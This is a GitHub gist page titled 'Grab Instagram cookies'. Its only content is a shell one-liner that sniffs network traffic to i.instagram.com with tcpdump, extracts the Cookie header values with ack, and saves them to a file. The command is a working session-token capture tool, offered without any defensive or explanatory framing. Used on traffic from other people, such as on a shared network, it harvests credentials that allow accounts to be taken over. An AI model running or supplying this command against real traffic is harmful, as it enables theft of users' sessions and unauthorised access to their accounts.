Skip to content

Instantly share code, notes, and snippets.

@stevegraham
Last active August 29, 2015 14:04
Show Gist options
  • Star 2 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save stevegraham/833736560d72e15576bd to your computer and use it in GitHub Desktop.
Save stevegraham/833736560d72e15576bd to your computer and use it in GitHub Desktop.
Grab Instagram cookies
sudo tcpdump -U -In -i en0 -s 2048 -A dst i.instagram.com | ack -o "(?<=Cookie: ).+" --flush > ~/Desktop/cookies
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment